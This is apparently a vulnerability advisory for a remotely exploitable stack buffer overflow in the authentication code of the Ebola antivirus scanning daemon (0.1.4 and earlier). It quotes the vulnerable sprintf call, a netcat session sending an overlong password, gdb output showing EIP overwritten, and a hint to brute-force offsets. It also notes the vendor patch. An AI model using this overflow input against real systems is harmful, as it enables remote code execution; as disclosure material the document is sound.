Ebola is a AntiVirus scanning daemon system which offers to improve considerably the performance of scanning systems such as AMaViS, Inflex and other such programs which require ondemand scanning from various AV engines. The Ebola daemon contains a remotely exploitable buffer overflow in its authentication sequence.
Vulnerable systems:
* Ebola version 0.1.4 and prior
This issue is caused by the handle_PASS() function in ebola.c char outstr[100];
...
if (passwd) {
if (PASS_authenticate(username, passwd) == _PASS_OK) {
sprintf(outstr,"PASS NOT ACCEPTED for user \"%s\",
pass \"%s\".\n",username,passwd);
...
Exploiting these issues is fairly simple... by providing either an overly long password or username you can overflow the 100 byte buffer and over write the EIP address.
bash-2.05b$ nc localhost 1665
Welcome to Ebola v0.1.4
user ZZZZXXX
USER name received, please send PASS
pass AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...ABCD
PASS NOT ACCEPTED for user "ZZZZXXX", pass "AAAAAAAAAAA...
A quick look in gdb shows us that this should be a vanilla stack overflow. [root@RiotStarter root]# gdb ebola 10440
Attaching to process 10440
Reading symbols from /home/dotslash/ebola-0.1.4/ebola...
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x44434241 in ?? ()
(gdb) i r
eax 0x0 0
ecx 0xbffba7c4 -1074026556
edx 0x0 0
ebx 0x41414141 1094795585
esp 0xbffbaa10 0xbffbaa10
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x44434241 0x44434241
The master ebola process never dies... its continues to spawn children regardless of how many times you attempt to exploit the issue. Because of this you can brute force both the length to eip and the offsets used for shellcode.
Vendor Status:
Paul L Daniels promptly responded to this issue, a patch was available immediately after it was reported.
